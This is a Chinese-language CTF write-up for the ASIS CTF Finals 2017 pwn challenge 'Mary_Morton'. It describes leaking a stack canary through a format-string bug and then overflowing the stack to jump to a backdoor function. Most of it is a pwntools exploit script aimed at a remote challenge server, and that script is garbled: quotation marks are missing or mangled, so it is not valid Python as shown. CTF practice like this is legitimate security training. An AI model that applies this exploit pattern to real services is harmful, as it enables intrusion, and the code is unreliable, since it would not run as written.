Mary_Morton

题目来源: ASIS-CTF-Finals-2017

题目描述:非常简单的热身pwn

 

程序开启了canary保护,因此利用格式化字符串漏洞泄露canary,然后利用栈溢出漏洞将返回地址指向后门函数即可

exp如下:

from pwn import *

#io = process(‘./pwn‘)
#io = gdb.debug(‘./pwn‘, ‘b *0x40093F‘)
io = remote(111.200.241.244, 50734)
backdoor_addr = 0x4008DA

io.recvuntil(3. Exit the battle \n)
io.sendline(2)
sleep(1)
io.sendline(%23$p\n)
canary = int(io.recvline().strip(), 16)
info(canary:+str(hex(canary)))

io.recvuntil(3. Exit the battle \n)
io.sendline(1)
payload = ba * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)

io.interactive()

 

Mary_Morton

上一篇:DFT scan chain 介绍


下一篇:01-复杂度1 最大子列和问题